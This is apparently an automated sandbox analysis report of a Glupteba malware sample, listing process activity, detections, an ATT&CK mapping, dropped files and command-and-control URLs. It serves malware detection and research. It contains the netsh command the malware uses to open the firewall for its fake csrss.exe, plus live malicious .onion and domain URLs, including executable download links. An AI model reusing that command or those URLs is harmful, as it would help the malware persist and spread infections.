        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exeQueries volume information: C:\Users\user\AppData\Local\Temp\csrss\tor\torrc VolumeInformation
        Source: C:\Windows\rss\csrss.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Uses netsh to modify the Windows network and firewall settings
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        Modifies the windows firewall
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
        Source: csrss.exe, 00000014.00000003.210669065138.000000000C564000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209396461579.000000000C60E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
        Source: csrss.exe, 00000014.00000003.210669065138.000000000C564000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209396461579.000000000C60E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Yara detected Glupteba
        Source: Yara matchFile source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Glupteba
        Source: Yara matchFile source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts21
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		2
        Disable or Modify Tools        		OS Credential Dumping1
        File and Directory Discovery        		Remote ServicesData from Local SystemExfiltration Over Other Network Medium3
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default Accounts2
        Command and Scripting Interpreter        		2
        Windows Service        		2
        Windows Service        		1
        Obfuscated Files or Information        		LSASS Memory14
        System Information Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		11
        Process Injection        		1
        Software Packing        		Security Account Manager241
        Security Software Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Non-Standard Port        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local Accounts1
        Service Execution        		11
        Registry Run Keys / Startup Folder        		1
        Scheduled Task/Job        		1
        DLL Side-Loading        		NTDS1
        Process Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer4
        Non-Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon Script11
        Registry Run Keys / Startup Folder        		1
        File Deletion        		LSA Secrets41
        Virtualization/Sandbox Evasion        		SSHKeyloggingData Transfer Size Limits15
        Application Layer Protocol        		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common331
        Masquerading        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureExfiltration Over C2 Channel1
        Proxy        		Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items41
        Virtualization/Sandbox Evasion        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
        Process Injection        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 877005 Sample: kdsyitkxmS.exe Startdate: 28/05/2023 Architecture: WINDOWS Score: 100 117 stun.stunprotocol.org 2->117 119 server5.duniadekho.bar 2->119 121 7 other IPs or domains 2->121 139 Snort IDS alert for network traffic 2->139 141 Antivirus detection for URL or domain 2->141 143 Antivirus detection for dropped file 2->143 149 7 other signatures 2->149 12 kdsyitkxmS.exe 13 2->12         started        15 csrss.exe 2->15         started        17 csrss.exe 2 2->17         started        19 4 other processes 2->19 signatures3 145 Performs DNS TXT record lookups 117->145 147 Uses STUN server to do NAT traversial 119->147 process4 dnsIp5 171 Detected unpacking (changes PE section rights) 12->171 173 Modifies the windows firewall 12->173 175 Drops PE files with benign system names 12->175 22 kdsyitkxmS.exe 1 2 12->22         started        26 powershell.exe 24 12->26         started        28 cmd.exe 15->28         started        30 cmd.exe 2 17->30         started        123 51.159.136.111 OnlineSASFR France 19->123 125 62.210.99.238 OnlineSASFR France 19->125 127 3 other IPs or domains 19->127 32 csrss.exe 19->32         started        34 powershell.exe 19->34         started        signatures6 process7 file8 115 C:\Windows\rss\csrss.exe, PE32 22->115 dropped 163 Creates an autostart registry key pointing to binary in C:\Windows 22->163 36 csrss.exe 7 27 22->36         started        41 cmd.exe 1 22->41         started        51 3 other processes 22->51 43 conhost.exe 26->43         started        45 fodhelper.exe 28->45         started        53 3 other processes 28->53 55 4 other processes 30->55 47 powershell.exe 32->47         started        49 conhost.exe 34->49         started        signatures9 process10 dnsIp11 129 server5.duniadekho.bar 185.82.216.50 ITL-BG Bulgaria 36->129 131 stun4.l.google.com 74.125.204.127 GOOGLEUS United States 36->131 133 6 other IPs or domains 36->133 107 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 36->107 dropped 109 C:\Users\user\AppData\Local\Temp\...\tor.exe, PE32 36->109 dropped 111 C:\Users\user\AppData\...\tor-gencert.exe, PE32 36->111 dropped 113 16 other files (10 malicious) 36->113 dropped 151 Multi AV Scanner detection for dropped file 36->151 153 Detected unpacking (changes PE section rights) 36->153 155 Uses shutdown.exe to shutdown or reboot the system 36->155 157 Uses schtasks.exe or at.exe to add and modify task schedules 36->157 57 injector.exe 36->57         started        60 cmd.exe 36->60         started        72 13 other processes 36->72 159 Uses netsh to modify the Windows network and firewall settings 41->159 62 netsh.exe 2 41->62         started        64 conhost.exe 41->64         started        161 Drops executables to the windows directory (C:\Windows) and starts them 45->161 66 csrss.exe 45->66         started        68 conhost.exe 47->68         started        75 3 other processes 51->75 70 csrss.exe 55->70         started        file12 signatures13 process14 dnsIp15 165 Antivirus detection for dropped file 57->165 167 Multi AV Scanner detection for dropped file 57->167 77 conhost.exe 57->77         started        91 2 other processes 60->91 169 Creates files in the system32 config directory 62->169 79 csrss.exe 66->79         started        81 powershell.exe 66->81         started        83 csrss.exe 70->83         started        85 powershell.exe 70->85         started        135 77.111.247.137 HERNLABSNL Norway 72->135 137 api.sec-tunnel.com 77.111.247.15 HERNLABSNL Norway 72->137 87 conhost.exe 72->87         started        89 conhost.exe 72->89         started        93 11 other processes 72->93 signatures16 process17 process18 95 powershell.exe 79->95         started        97 conhost.exe 81->97         started        99 powershell.exe 83->99         started        101 conhost.exe 85->101         started        process19 103 conhost.exe 95->103         started        105 conhost.exe 99->105         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        kdsyitkxmS.exe32%VirustotalBrowse
        kdsyitkxmS.exe32%ReversingLabs
        kdsyitkxmS.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe100%AviraTR/Agent.twerk
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll100%AviraTR/Redcap.gsjan
        B:\EFI\Boot\old.efi (copy)0%ReversingLabs
        B:\EFI\Microsoft\Boot\fw.efi (copy)0%ReversingLabs
        C:\EFI\Boot\EfiGuardDxe.efi0%ReversingLabs
        C:\EFI\Boot\bootx64.efi0%ReversingLabs
        C:\EFI\Microsoft\Boot\bootmgfw.efi0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll88%ReversingLabsWin64.Trojan.Gluphook
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe92%ReversingLabsWin64.Trojan.GluptebaDrop
        C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe2%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libgcc_s_dw2-1.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libwinpthread-1.dll4%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\zlib1.dll0%ReversingLabs
        C:\Windows\rss\csrss.exe32%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://invalidlog.txtlookup0%Avira URL Cloudsafe
        https://duniadekho.barSETCONF0%Avira URL Cloudsafe
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ100%Avira URL Cloudmalware
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d100%Avira URL Cloudmalware
        https://server5.duniadekho.bararch=64-bit&build_number=19042&Intel%28R%290%Avira URL Cloudsafe
        https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e100%Avira URL Cloudmalware
        https://github.comW0%Avira URL Cloudsafe
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233b0%Avira URL Cloudsafe
        https://duniadekho.bar100%Avira URL Cloudmalware
        http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:0%Avira URL Cloudsafe
        https://server5.duniadekho.bar/api/restriction-usH2100%Avira URL Cloudmalware
        http://devlog.gregarius.net/docs/ua)Links0%Avira URL Cloudsafe
        https://twopixis.com/w/w-8-debug.exe100%Avira URL Cloudmalware
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll100%Avira URL Cloudmalware
        https://twopixis.com/watchdog100%Avira URL Cloudmalware
        https://twopixis.com/watchdog/watchdog.exe100%Avira URL Cloudmalware
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP100%Avira URL Cloudmalware
